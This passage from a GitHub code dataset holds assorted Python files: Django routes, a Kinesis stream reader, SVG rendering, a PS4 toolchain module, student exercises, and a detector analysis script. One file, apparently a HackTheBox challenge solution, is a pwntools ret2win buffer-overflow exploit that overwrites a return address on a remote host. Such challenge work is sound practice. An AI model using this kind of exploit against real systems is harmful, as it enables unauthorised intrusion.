logout_request, AboutUs, CommentsView\n\n\nurlpatterns = [\n path(\"\", HomePageView.as_view(), name=\"home\"),\n path(\"search-container/\", SearchContainer.as_view(), name=\"search_container\"),\n path(\"search-results/\", SearchResultsView.as_view(), name=\"search_results\"),\n path(\"search-alphabet/\", SearchAlphabet.as_view(), name=\"search_alphabet\"),\n path(\"about_us\", AboutUs.as_view(), name=\"about_us\"),\n path(\"register\", register_request, name=\"register\"),\n path(\"login\", login_request, name=\"login\"),\n path(\"logout\", logout_request, name=\"logout\"),\n\n path(\"comments/\", CommentsView.as_view(), name=\"comments\")\n\n]\n","repo_name":"oksanastep/My_beetroot_project","sub_path":"project/myproject/waste_sorting/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16064070132","text":"from pwn import *\nimport os\n\nos.system('clear')\ncontext.log_level = 'debug'\nsh = remote('206.189.28.76',30687)\np = b'A' * 56\nwinAddr = 4198918 #0x401206\np += p64(winAddr)\nsh.sendlineafter(b': ', p)\nsh.interactive()\n","repo_name":"jon-brandy/hackthebox","sub_path":"Categories/Pwn/Reg/ret2win.py","file_name":"ret2win.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"31"} +{"seq_id":"34309097351","text":"import boto3\nimport calendar\nimport gzip\nimport json\nimport time\nimport sys\n\nfrom datetime import timezone\n\n\nclient = boto3.client('kinesis')\n\n\ndef parse_timestamp(value):\n for fmt in 
[\"%Y-%m-%dT%H:%M:%S\", \"%Y-%m-%d %H:%M:%S\"]:\n try:\n return calendar.timegm(time.strptime(value, fmt))\n except ValueError:\n pass\n try:\n return float(value)\n except:\n raise ValueError(f\"invalid timestamp: {value}\")\n\n\ndef retrieve_shards(stream_name):\n \"\"\" Retrieves information about all shards for the specified stream.\n \"\"\"\n result = []\n paginator = client.get_paginator('describe_stream')\n for page in paginator.paginate(StreamName=stream_name):\n result += page['StreamDescription']['Shards']\n return result\n\n\ndef retrieve_shard_iterators(stream_name, shards, iterator_type, timestamp=None):\n \"\"\" Returns a map of shard ID to iterator.\n \"\"\"\n result = {}\n for shard in shards:\n shard_id = shard['ShardId']\n if timestamp:\n resp = client.get_shard_iterator(StreamName=stream_name, ShardId=shard_id, ShardIteratorType=iterator_type, Timestamp=timestamp)\n else:\n resp = client.get_shard_iterator(StreamName=stream_name, ShardId=shard_id, ShardIteratorType=iterator_type)\n result[shard_id] = resp['ShardIterator']\n return result\n\n\ndef retrieve_records(iterators):\n \"\"\" Retrieves all records for the provided iterator map, updating the map with new iterators.\n \"\"\"\n result = []\n for shard_id, itx in iterators.items():\n resp = client.get_records(ShardIterator=itx)\n for rec in resp['Records']:\n data = rec['Data']\n if data.startswith(b'\\x1f\\x8b'):\n data = gzip.decompress(data)\n result.append({\n 'SequenceNumber': rec['SequenceNumber'],\n 'ApproximateArrivalTimestamp': rec['ApproximateArrivalTimestamp'].astimezone(timezone.utc).isoformat(),\n 'Data': data.decode('utf-8'),\n 'PartitionKey': rec['PartitionKey']\n })\n iterators[shard_id] = resp['NextShardIterator']\n return result\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2 or len(sys.argv) > 5:\n print(__doc__)\n sys.exit(1)\n\n stream_name = sys.argv[1]\n iterator_type = sys.argv[2] if len(sys.argv) > 2 else 'LATEST'\n timestamp = parse_timestamp(sys.argv.pop(3)) if iterator_type == 'AT_TIMESTAMP' else None\n poll_interval = int(sys.argv[3]) if len(sys.argv) > 3 else 10\n\n shards = retrieve_shards(stream_name)\n iterators = retrieve_shard_iterators(stream_name, shards, iterator_type, timestamp)\n while True:\n for rec in retrieve_records(iterators):\n print(json.dumps(rec))\n time.sleep(poll_interval)\n","repo_name":"kdgregory/aws-misc","sub_path":"utils/kinesis_reader.py","file_name":"kinesis_reader.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"31"} +{"seq_id":"19424514966","text":"#!/usr/bin/env python3\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n\nfrom gi.repository import GObject\n\nimport xdg.BaseDirectory\nimport svgwrite\nimport os\n\nDATA_PATH = os.path.join(xdg.BaseDirectory.xdg_data_home, 'tuhigui')\n\n\nclass JsonSvg(GObject.Object):\n def __init__(self, json, orientation, *args, **kwargs):\n self.json = json\n try:\n os.mkdir(DATA_PATH)\n except FileExistsError:\n pass\n\n self.timestamp = json['timestamp']\n self.filename = os.path.join(DATA_PATH, f'{self.timestamp}.svg')\n self.orientation = orientation\n self._convert()\n\n def _convert(self):\n js = self.json\n dimensions = js['dimensions']\n if dimensions == [0, 0]:\n width, height = 100, 100\n else:\n # Original dimensions are too big for SVG Standard\n # so we normalize them\n width, height = dimensions[0] / 100, dimensions[1] / 100\n\n if self.orientation in ['portrait', 'reverse-Portrait']:\n size = (height, width)\n else:\n size = (width, height)\n svg = svgwrite.Drawing(filename=self.filename, size=size)\n g = svgwrite.container.Group(id='layer0')\n for stroke_num, s in enumerate(js['strokes']):\n\n points_with_sk_width = []\n\n for p in s['points']:\n\n x, y = p['position']\n # Normalize coordinates too\n x, y = x / 100, y / 100\n\n if self.orientation == 'reverse-portrait':\n x, y = y, width - x\n elif self.orientation == 'portrait':\n x, y = height - y, x\n elif self.orientation == 'reverse-landscape':\n x, y = width - x, height - y\n\n delta = (p['pressure'] - 1000.0) / 1000.0\n stroke_width = 0.4 + 0.20 * delta\n points_with_sk_width.append((x, y, stroke_width))\n\n lines = svgwrite.container.Group(id=f'strokes_{stroke_num}', stroke='black')\n for i, (x, y, stroke_width) in enumerate(points_with_sk_width):\n if i != 0:\n xp, yp, stroke_width_p = points_with_sk_width[i - 1]\n lines.add(\n svg.line(\n start=(xp, yp),\n end=(x, y),\n stroke_width=stroke_width,\n style='fill:none'\n )\n )\n g.add(lines)\n\n svg.add(g)\n svg.save()\n","repo_name":"whot/tuhigui","sub_path":"tuhigui/svg.py","file_name":"svg.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"4840219806","text":"# # Challenge 1\n# # Ask the user for a number and a length.\n# num = int(input('give me a Number'));\n# length = int(input('give me a length too'));\n#\n# # probabvly would be good if the inputs arent texts before we turn them to\n# # numbers or after we turn them to number\n# # Create a program that prints a list of multiples of the number until the list length reaches length.\n#\n# i = 1\n# multi_list = []\n# while i < length + 1:\n# multi_list.append(i*num);\n# i+=1\n#\n# print(multi_list)\n\n# Challenge 2\n# Write a program that asks a string to the user, and display a new string with any duplicate consecutive letters removed.\nrep_word = input('give me a word with consecutive letters')\nnew_word = []\nfor i in range(0,len(rep_word)):\n if len(new_word) == 0:\n new_word.append(rep_word[i])\n if rep_word[i] in new_word and rep_word[i] == new_word[-1]:\n continue\n else:\n new_word.append(rep_word[i])\n\nnew_word = ''.join(new_word)\nprint(new_word)\n\ndict = {\n 'value':'something',\n 'a_value': 'something else',\n \"b\" : '2'\n}\n\na,*s = dict.items()\nprint(s)\n\nsample_dict = {\n \"name\": \"Kelly\",\n \"age\":25,\n \"salary\": 8000,\n \"city\": \"New york\"\n\n}\nkeys_to_remove = [\"name\", \"salary\"]\n\nfor value in keys_to_remove:\n if value in sample_dict:\n 
sample_dict.pop(value)\n\nprint(sample_dict)","repo_name":"MiniManch/DI_Bootcamp","sub_path":"Week-6/Day-4/Daily-Challenge/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25926785657","text":"__authors__ = [\"Marcus Drobisch\"]\n__contact__ = \"roseguarden@fabba.space\"\n__credits__ = []\n__license__ = \"GPLv3\"\n\nimport json\n\n\nclass RegisterNodeStartup:\n def __init__(self, action_id=1):\n self.action = \"registerNodeStartup\"\n self.actionid = action_id\n self.version = \"1.0.0\"\n\n def to_json(self):\n return json.dumps(self, default=lambda o: o.__dict__)\n\n\nclass RequestUserAccess:\n def __init__(self, auth_key, action_id=1):\n self.action = \"requestUserAccess\"\n self.actionid = action_id\n self.version = \"1.0.0\"\n self.auth_key = auth_key\n\n def to_json(self):\n return json.dumps(self, default=lambda o: o.__dict__)\n","repo_name":"konglomerat/roseguarden","sub_path":"backend/tests/requests/nodeActions.py","file_name":"nodeActions.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8524782922","text":"#!/usr/bin/env python3\n\nimport glob\nimport json \nimport os\n\nclass SnippetDocumentor():\n\n def __init__(self):\n self.source = []\n self.docs = []\n self.content = []\n\n def assemble_content(self, output_path):\n for doc in self.docs:\n parts = doc.split('---')\n meta = json.loads(parts[1])\n self.content.append(parts[0])\n self.content.append('
<pre>')\n            for line_group in meta['lines']:\n                for line_index in range(line_group[0] - 1, line_group[1]):\n                    self.content.append(\n                        f\"{line_index + 1}  {self.source[line_index]}\"\n                    )\n            self.content.append('</pre>
    ')\n\n with open(output_path, 'w') as _out:\n _out.write(\"\\n\".join(self.content))\n\n def load_source(self, source_path):\n with open(source_path) as _source:\n self.source = _source.read().split(\"\\n\")\n\n def load_docs(self, docs_dir):\n local_file_list = [\n file for file in glob.glob(f\"{docs_dir}/*\")\n if os.path.isfile(file)\n ]\n local_file_list.sort()\n for local_file in local_file_list:\n with open(local_file) as _in:\n self.docs.append(_in.read())\n\nif __name__ == \"__main__\":\n working_dir = os.path.dirname(os.path.realpath(__file__))\n\n sd = SnippetDocumentor()\n sd.load_source(__file__)\n sd.load_docs(f\"{working_dir}/docs\")\n sd.assemble_content(f\"{working_dir}/DOCSCONTENT.html\")\n\n","repo_name":"alanwsmith/html-css-js.alanwsmith.com","sub_path":"site/recipes/live_code_codes_maker_experiment_alpha--2gxv4l6iyo7v/builder/src/PYTHON.py","file_name":"PYTHON.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6200601225","text":"import csbuild\n\nfrom .. import _shared_globals\nfrom .. import toolchain_gcc\nfrom ..plugin_plist_generator import *\n\n\nSCE_ORBIS_SDK_DIR = os.environ.get( \"SCE_ORBIS_SDK_DIR\", \"\" )\nSCE_ORBIS_SYSLIB_DIR = os.path.join( SCE_ORBIS_SDK_DIR, \"target\", \"lib\" )\n\n\nclass Ps4Base( object ):\n\tdef __init__( self ):\n\t\tpass\n\n\n\tdef GetValidArchitectures( self ):\n\t\treturn [\"x64\"]\n\n\n\tdef GetDefaultArchitecture(self):\n\t\treturn \"x64\"\n\n\n\tdef _copyTo( self, other ):\n\t\tpass\n\n\n\tdef _getSysRoot( self ):\n\t\t# PS4 does not set the sysroot.\n\t\treturn \"\"\n\n\n\tdef _getStandardLibraryArg( self, project ):\n\t\t# PS4 does not set the standard library.\n\t\treturn \"\"\n\n\nclass Ps4Compiler( Ps4Base, toolchain_gcc.GccCompiler ):\n\tdef __init__( self, shared ):\n\t\ttoolchain_gcc.GccCompiler.__init__( self, shared )\n\t\tPs4Base.__init__( self )\n\n\t\tself._settingsOverrides[\"cxx\"] = os.path.join( SCE_ORBIS_SDK_DIR, \"host_tools\", \"bin\", \"orbis-clang++.exe\" )\n\t\tself._settingsOverrides[\"cc\"] = os.path.join( SCE_ORBIS_SDK_DIR, \"host_tools\", \"bin\", \"orbis-clang.exe\" )\n\n\n\tdef copy(self, shared):\n\t\tret = toolchain_gcc.GccCompiler.copy( self, shared )\n\t\tPs4Base._copyTo( self, ret )\n\t\treturn ret\n\n\n\tdef _getIncludeDirs( self, includeDirs ):\n\t\t\"\"\"Returns a string containing all of the passed include directories, formatted to be passed to gcc/g++.\"\"\"\n\t\tret = \"\"\n\t\tfor inc in includeDirs:\n\t\t\tret += '-I\"{}\" '.format( os.path.abspath( inc ) )\n\t\tret += '-I\"{}\" -I\"{}\" '.format( os.path.join( SCE_ORBIS_SDK_DIR, \"target\", \"include\" ), os.path.join( SCE_ORBIS_SDK_DIR, \"target\", \"include_common\" ) )\n\t\treturn ret\n\n\n\tdef _getBaseCommand( self, compiler, project, isCpp ):\n\t\tret = toolchain_gcc.GccCompiler._getBaseCommand( self, compiler, project, isCpp )\n\t\tret = \"{}\".format( ret )\n\t\treturn ret\n\n\n\tdef SupportsObjectScraping(self):\n\t\treturn False\n\n\n\tdef GetObjectScraper(self):\n\t\treturn None\n\n\nclass Ps4Linker( Ps4Base, toolchain_gcc.GccLinker ):\n\tdef __init__( self, shared ):\n\t\ttoolchain_gcc.GccLinker.__init__( self, shared )\n\t\tPs4Base.__init__( self )\n\n\t\tself._ar = os.path.join( SCE_ORBIS_SDK_DIR, \"host_tools\", \"bin\", \"orbis-ar.exe\" )\n\n\t\tself._settingsOverrides[\"cxx\"] = os.path.join( SCE_ORBIS_SDK_DIR, \"host_tools\", \"bin\", \"orbis-clang++.exe\" )\n\t\tself._settingsOverrides[\"cc\"] = os.path.join( 
SCE_ORBIS_SDK_DIR, \"host_tools\", \"bin\", \"orbis-clang.exe\" )\n\n\n\tdef copy( self, shared ):\n\t\tret = toolchain_gcc.GccLinker.copy( self, shared )\n\t\tPs4Base._copyTo( self, ret )\n\t\treturn ret\n\n\n\tdef InterruptExitCode( self ):\n\t\treturn 2\n\n\n\tdef _getLibraryDirs( self, libDirs, forLinker ):\n\t\t# No library directories necessary since all libraries are linked with full paths.\n\t\treturn \"\"\n\n\n\tdef _getStartGroupFlags( self ):\n\t\treturn \"-Wl,--start-group\"\n\n\n\tdef _getSharedLibraryFlag( self, project ):\n\t\t# PS4 has no explicit \"shared\" flag.\n\t\treturn \"\"\n\n\n\tdef _setupForProject( self, project ):\n\t\tself._project_settings = project\n\t\tif not SCE_ORBIS_SDK_DIR:\n\t\t\tlog.LOG_ERROR( \"No PS4 SDK installation detected!\" )\n\t\t\tcsbuild.Exit( -1 )\n\n\n\tdef _getLibraryArg(self, lib):\n\t\tfor depend in self._project_settings.reconciledLinkDepends:\n\t\t\tdependProj = _shared_globals.projects[depend]\n\t\t\tdependLibName = dependProj.outputName\n\t\t\tsplitName = os.path.splitext(dependLibName)[0]\n\t\t\tif splitName == lib or splitName == \"lib{}\".format( lib ):\n\t\t\t\tif dependProj.type == csbuild.ProjectType.LoadableModule:\n\t\t\t\t\treturn \"\"\n\t\t\t\tif not dependLibName.startswith( \"lib\" ):\n\t\t\t\t\tdependLibName = \"lib{}\".format( dependLibName )\n\t\t\t\treturn '\"{}\" '.format( os.path.join( dependProj.outputDir, dependLibName ) )\n\t\treturn '\"{}\" '.format( self._actual_library_names[lib] )\n\n\n\tdef _getObjcAbiVersionArg(self):\n\t\t# Objective-C is not supported on PS4.\n\t\treturn \"\"\n\n\n\tdef GetLinkCommand( self, project, outputFile, objList ):\n\t\t# The PS4 linker does not implicitly prepend libraries with \"lib\", but it does seem to want them that way\n\t\t# when linking against them via \"-l\". 
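For example, \"-lfoo\" resolves only against a file actually named \"libfoo\" with a .a or .prx extension, as FindLibrary below assumes. 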
The easy answer is to force all libraries to be prepended with \"lib\".\n\t\tif project.type != csbuild.ProjectType.Application:\n\t\t\toutputBasename = os.path.basename( outputFile )\n\t\t\tif not outputBasename.startswith( \"lib\" ):\n\t\t\t\toutputDirname = os.path.dirname( outputFile )\n\t\t\t\toutputFile = os.path.join( outputDirname, \"lib{}\".format( outputBasename ) )\n\t\tret = toolchain_gcc.GccLinker.GetLinkCommand( self, project, outputFile, objList )\n\t\tif project.type == csbuild.ProjectType.SharedLibrary or project.type == csbuild.ProjectType.LoadableModule:\n\t\t\tret = '{} -Wl,-oformat=prx -Wl,-prx-stub-output-dir=\"{}\"'.format( ret, project.outputDir )\n\t\treturn ret\n\n\n\tdef FindLibrary( self, project, library, libraryDirs, force_static, force_shared ):\n\t\tself._setupForProject( project )\n\t\tlibraryDirs.append( SCE_ORBIS_SYSLIB_DIR )\n\n\t\tfor lib_dir in libraryDirs:\n\t\t\tlog.LOG_INFO( \"Looking for library {} in directory {}...\".format( library, lib_dir ) )\n\t\t\tlib_file_path = os.path.join( lib_dir, library )\n\t\t\tlibFileStatic = \"{}.a\".format( lib_file_path )\n\t\t\tlibFileDynamic = \"{}.prx\".format( lib_file_path )\n\t\t\t# Check for a static lib.\n\t\t\tif os.access( libFileStatic , os.F_OK ) and not force_shared:\n\t\t\t\tself._actual_library_names.update( { library : libFileStatic } )\n\t\t\t\treturn libFileStatic\n\t\t\t# Check for a dynamic lib.\n\t\t\tif os.access( libFileDynamic , os.F_OK ) and not force_static:\n\t\t\t\tself._actual_library_names.update( { library : libFileDynamic } )\n\t\t\t\treturn libFileDynamic\n\n\t\tfor lib_dir in libraryDirs:\n\t\t\t# Compatibility with Linux's way of adding lib- to the front of its libraries\n\t\t\tlibfileCompat = \"lib{}\".format( library )\n\t\t\tlog.LOG_INFO( \"Looking for library {} in directory {}...\".format( libfileCompat, lib_dir ) )\n\t\t\tlib_file_path = os.path.join( lib_dir, libfileCompat )\n\t\t\tlibFileStatic = \"{}.a\".format( lib_file_path )\n\t\t\tlibFileDynamic = \"{}.prx\".format( lib_file_path )\n\t\t\t# Check for a static lib.\n\t\t\tif os.access( libFileStatic , os.F_OK ) and not force_shared:\n\t\t\t\tself._actual_library_names.update( { library : libFileStatic } )\n\t\t\t\treturn libFileStatic\n\t\t\t# Check for a dynamic lib.\n\t\t\tif os.access( libFileDynamic , os.F_OK ) and not force_static:\n\t\t\t\tself._actual_library_names.update( { library : libFileDynamic } )\n\t\t\t\treturn libFileDynamic\n\n\t\t# The library wasn't found.\n\t\treturn None\n\n\n\tdef GetDefaultOutputExtension( self, projectType ):\n\t\tif projectType == csbuild.ProjectType.Application:\n\t\t\treturn \".elf\"\n\t\telif projectType == csbuild.ProjectType.StaticLibrary:\n\t\t\treturn \".a\"\n\t\telif projectType == csbuild.ProjectType.SharedLibrary or projectType == csbuild.ProjectType.LoadableModule:\n\t\t\treturn \".prx\"\n","repo_name":"zoejbare/csbuild","sub_path":"csbuild/proprietary/toolchain_ps4.py","file_name":"toolchain_ps4.py","file_ext":"py","file_size_in_byte":6526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16596047133","text":"\"\"\"\ndefine a class with data members\n@data members\nlen : length of word\nwrd : orignal word\nswapwrd : swapped word\nsortwrd : sorted word\n@methods\nSwapSort() : Constructor\nvoid readword() : to accept a word in upper case\nvoid swapchar() : to swap first and last alphabet\nvoid sortwrd() : to sort the charchters\nvoid diplay() : display sortwrd swapwrd, wrd\n\"\"\"\n\n\ndef main():\n class 
SwapSort():\n length = 0\n wrd = \"\"\n swapwrd = \"\"\n sortwrd = \"\"\n\n def __init__(self, wrd):\n self.length = len(wrd)\n self.readword(wrd)\n\n def readword(self, nwrd):\n if nwrd.isupper():\n self.wrd = nwrd\n else:\n print(\"\\nWord should be in upper case only\\n\")\n\n def swapchar(self):\n bwrd = bytearray(self.wrd, encoding=\"utf\")\n bwrd[0], bwrd[-1] = bwrd[-1], bwrd[0]\n self.swapwrd = bwrd.decode(\"utf\")\n\n def sortword(self):\n self.sortwrd = \"\".join(sorted(self.wrd))\n\n def display(self):\n print(f'Original Word \"{self.wrd}\"')\n print(f'Sorted Word \"{self.sortwrd}\"')\n print(f'Word with swapped characters \"{self.swapwrd}\"')\n\n word = input(\"Enter a word\")\n s = SwapSort(word)\n # s.readword(\"NEWTEST\")\n s.swapchar()\n s.sortword()\n s.display()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"18BCS4595A/PythonQuestion-part-1-","sub_path":"prblm3.py","file_name":"prblm3.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10783080960","text":"target = int(input())\nbroken = int(input())\nbroken_list = list(map(int, input().split()))\n\"\"\"\n1. Pick a candidate channel to start from.\n2. Check whether the candidate contains any broken button.\n3. If it does, skip it; otherwise cost = number of digits + distance to the target channel.\n4. \n\"\"\"\nans = 10000001\ndef check(num):\n num = str(num)\n for elem in num:\n if int(elem) in broken_list:\n return False\n return True\n\nfor base in range(1000001):\n if check(base):\n temp1 = len(str(base)) + abs(target - base)\n temp2 = abs(target - 100)\n if ans > temp1:\n ans = temp1\n if ans > temp2:\n ans = temp2\nprint(ans)","repo_name":"entrekid/daily_algorithm","sub_path":"2020/0426/1107.py","file_name":"1107.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12915887725","text":"#!/usr/bin/env python\n\"\"\"\nDo the charge resolution analysis\n\nUsage:\n digicam-charge-resolution [options] [--] ...\n\nOptions:\n -h --help Show this screen.\n --max_events=N Maximum number of events to analyse.\n --output_file=OUTPUT File where to store the fit results.\n [default: ./fit_results.npz]\n -c --compute Compute the data.\n -d --display Display.\n -v --debug Enter the debug mode.\n -p --pixel= Give a list of pixel IDs.\n --ac_levels= LED AC DAC level.\n --dc_levels= LED DC DAC level.\n --shift=N number of bins to shift before integrating\n [default: 0].\n --integral_width=N number of bins to integrate over\n [default: 7].\n --charge_linearity=FILE Charge linearity file\n --save_figures Save the plots to the OUTPUT folder\n --timing=FILE Timing npz.\n --saturation_threshold=N Saturation threshold in LSB\n [default: 3000]\n --pulse_tail Use pulse tail for charge integration\n\"\"\"\n\nimport numpy as np\nfrom digicampipe.instrument.light_source import ACLED\nfrom tqdm import tqdm\nimport os\n\nfrom digicampipe.calib.baseline import subtract_baseline, fill_digicam_baseline, fill_dark_baseline, compute_baseline_shift, _crosstalk_drop_from_baseline_shift, _pde_drop_from_baseline_shift, _gain_drop_from_baseline_shift, compute_nsb_rate\nfrom digicampipe.calib.charge import \\\n compute_charge_with_saturation_and_threshold, compute_number_of_pe_from_table, rescale_pulse\nfrom digicampipe.io.event_stream import calibration_event_stream\n\n\ndef charge_to_pe(x, measured_average_charge, true_pe):\n\n X = measured_average_charge.T\n Y = true_pe.T\n\n dX = np.diff(X, axis=-1)\n dY = np.diff(Y, axis=-1)\n\n sign = np.sign(x)\n\n w = 
np.clip((np.abs(x[:, None]) - X[:, :-1]) / dX[:, :], 0, 1)\n\n y = Y[:, 0] + np.nansum(w * dY[:, :], axis=1)\n y = y * sign\n return y\n\n\ndef compute(files, ac_levels, dc_levels, output_filename, dark_charge, dark_baseline,\n max_events, pixels, integral_width, timing, saturation_threshold, pulse_tail, debug):\n\n\n\n directory = '/sst1m/analyzed/calib/mpe/'\n file_calib = os.path.join(directory, 'mpe_fit_results_combined.npz')\n data_calib = dict(np.load(file_calib))\n\n pe = data_calib['mu']\n pe_err = data_calib['mu_error']\n ac = data_calib['ac_levels'][:, 0]\n ac_led = ACLED(ac, pe, pe_err)\n pde = 0.9 # window filter\n true_pe = ac_led(ac_levels).T * pde\n # mask = true_pe < 5\n # true_pe[mask] = pe[mask]\n\n n_pixels = len(pixels)\n n_ac_level = len(ac_levels)\n n_dc_level = len(dc_levels)\n n_files = len(files)\n\n assert n_files == (n_ac_level * n_dc_level)\n\n shape = (n_dc_level, n_ac_level, n_pixels)\n nsb_mean = np.zeros(shape)\n nsb_std = np.zeros(shape)\n pe_mean = np.zeros(shape)\n pe_std = np.zeros(shape)\n\n\n print(dark_baseline, dark_charge)\n pe_interpolator = lambda x: charge_to_pe(x, dark_charge, true_pe)\n\n for i, dc_level in tqdm(enumerate(dc_levels), total=n_dc_level):\n\n for j, ac_level in tqdm(enumerate(ac_levels), total=n_ac_level):\n\n index_file = i * n_ac_level + j\n file = files[index_file]\n events = calibration_event_stream(file, max_events=max_events)\n events = fill_dark_baseline(events, dark_baseline)\n events = fill_digicam_baseline(events)\n events = compute_baseline_shift(events)\n events = subtract_baseline(events)\n # events = compute_nsb_rate(events, gain, pulse_area, crosstalk,\n # bias_resistance, cell_capacitance)\n # events = compute_charge_with_saturation(events, integral_width=7)\n events = compute_charge_with_saturation_and_threshold(events,\n integral_width=integral_width,\n debug=debug,\n trigger_bin=timing,\n saturation_threshold=saturation_threshold,\n pulse_tail=pulse_tail)\n\n events = compute_number_of_pe_from_table(events, pe_interpolator)\n events = rescale_pulse(events, gain_func=_gain_drop_from_baseline_shift,\n xt_func=_crosstalk_drop_from_baseline_shift,\n pde_func=_pde_drop_from_baseline_shift)\n # events = compute_maximal_charge(events)\n\n for n, event in enumerate(events):\n\n pe_mean[i, j] += event.data.reconstructed_number_of_pe\n pe_std[i, j] += event.data.reconstructed_number_of_pe**2\n # nsb_mean[i] += event.data.nsb_rate\n # nsb_std[i] += event.data.nsb_rate**2\n # print(event.data.baseline_shift)\n\n pe_mean[i, j] = pe_mean[i, j] / (n + 1)\n # nsb_mean[i] = nsb_mean[i] / (n + 1)\n pe_std[i, j] = pe_std[i, j] / (n + 1)\n pe_std[i, j] = np.sqrt(pe_std[i, j] - pe_mean[i, j]**2)\n # nsb_std[i] = nsb_std[i] / (n + 1)\n # nsb_std[i] = np.sqrt(nsb_std[i] - nsb_mean[i]**2)\n\n np.savez(output_filename, pe_reco_mean=pe_mean, pe_reco_std=pe_std,\n ac_levels=ac_levels, pe=pe, pe_err=pe_err, true_pe=true_pe,\n nsb_mean=nsb_mean, nsb_std=nsb_std)\n\n\nif __name__ == '__main__':\n\n integral_width = 7\n # saturation_threshold = dict(np.load('/home/alispach/Documents/PhD/ctasoft/digicampipe/thresholds.npz'))\n # saturation_threshold = saturation_threshold['threshold_charge']\n # mean = np.nanmean(saturation_threshold)\n # saturation_threshold[np.isnan(saturation_threshold)] = mean\n\n saturation_threshold = 3000\n\n max_events = None\n directory = '/sst1m/analyzed/calib/mpe/'\n file_calib = os.path.join(directory, 'mpe_fit_results_combined.npz')\n data_calib = np.load(file_calib)\n\n # 
ac_levels = data_calib['ac_levels'][:, 0]\n ac_levels = np.hstack(\n [np.arange(0, 20, 1), np.arange(20, 40, 5), np.arange(45, 450, 5)])\n pde = 0.9 # window filter\n\n pe = data_calib['mu']\n pe_err = data_calib['mu_error']\n ac_led = ACLED(ac_levels, pe, pe_err)\n\n ac_levels = np.hstack([np.arange(0, 20, 2), np.arange(20, 450, 10)])\n\n true_pe = ac_led(ac_levels).T * pde\n # mask = true_pe < 5\n # true_pe[mask] = pe[mask]\n\n # files = ['/sst1m/raw/2018/06/28/SST1M_01/SST1M_01_20180628_{}.fits.fz'.format(i) for i in range(1505, 1557 + 1, 1)]\n files = [\n '/sst1m/raw/2018/06/28/SST1M_01/SST1M_01_20180628_{}.fits.fz'.format(i)\n for i in range(1982, 2034 + 1, 1)] # 125 MHz\n # files = ['/sst1m/raw/2018/06/28/SST1M_01/SST1M_01_20180628_{}.fits.fz'.format(i) for i in range(2088, 2140, 1)] # < 660 MHz\n\n # files = ['/sst1m/raw/2018/06/28/SST1M_01/SST1M_01_20180628_{}.fits.fz'.format(i) for i in range(1350, 1454 + 1, 1)]\n # files = files[100:]\n # ac_levels = ac_levels[100:]\n n_pixels = 1296\n n_files = len(files)\n\n assert n_files == len(ac_levels)\n filename_1_dark = 'charge_linearity_24102018_dark.npz'\n filename_2 = 'charge_resolution_24102018_125MHz.npz'\n\n debug = False\n pulse_tail = False\n shape = (n_files, n_pixels)\n nsb_mean = np.zeros(shape)\n nsb_std = np.zeros(shape)\n pe_mean = np.zeros(shape)\n pe_std = np.zeros(shape)\n\n timing = np.load('/sst1m/analyzed/calib/timing/timing.npz')\n timing = timing['time'] // 4\n\n data_1 = dict(np.load(filename_1_dark))\n dark_baseline = data_1['baseline_mean'][0]\n charge_mean = data_1['charge_mean']\n\n print(dark_baseline)\n pe_interpolator = lambda x: charge_to_pe(x, charge_mean, true_pe)\n\n for i, file in tqdm(enumerate(files), total=n_files):\n\n events = calibration_event_stream(file, max_events=max_events)\n events = fill_dark_baseline(events, dark_baseline)\n events = fill_digicam_baseline(events)\n events = compute_baseline_shift(events)\n events = subtract_baseline(events)\n # events = compute_nsb_rate(events, gain, pulse_area, crosstalk,\n # bias_resistance, cell_capacitance)\n # events = compute_charge_with_saturation(events, integral_width=7)\n events = compute_charge_with_saturation_and_threshold(events,\n integral_width=integral_width,\n debug=debug,\n trigger_bin=timing,\n saturation_threshold=saturation_threshold,\n pulse_tail=pulse_tail)\n\n events = compute_number_of_pe_from_table(events, pe_interpolator)\n events = rescale_pulse(events, gain_func=_gain_drop_from_baseline_shift,\n xt_func=_crosstalk_drop_from_baseline_shift,\n pde_func=_pde_drop_from_baseline_shift)\n # events = compute_maximal_charge(events)\n\n for n, event in enumerate(events):\n pe_mean[i] += event.data.reconstructed_number_of_pe\n pe_std[i] += event.data.reconstructed_number_of_pe ** 2\n # nsb_mean[i] += event.data.nsb_rate\n # nsb_std[i] += event.data.nsb_rate**2\n # print(event.data.baseline_shift)\n\n pe_mean[i] = pe_mean[i] / (n + 1)\n # nsb_mean[i] = nsb_mean[i] / (n + 1)\n pe_std[i] = pe_std[i] / (n + 1)\n pe_std[i] = np.sqrt(pe_std[i] - pe_mean[i] ** 2)\n # nsb_std[i] = nsb_std[i] / (n + 1)\n # nsb_std[i] = np.sqrt(nsb_std[i] - nsb_mean[i]**2)\n\n np.savez(filename_2, pe_reco_mean=pe_mean, pe_reco_std=pe_std,\n 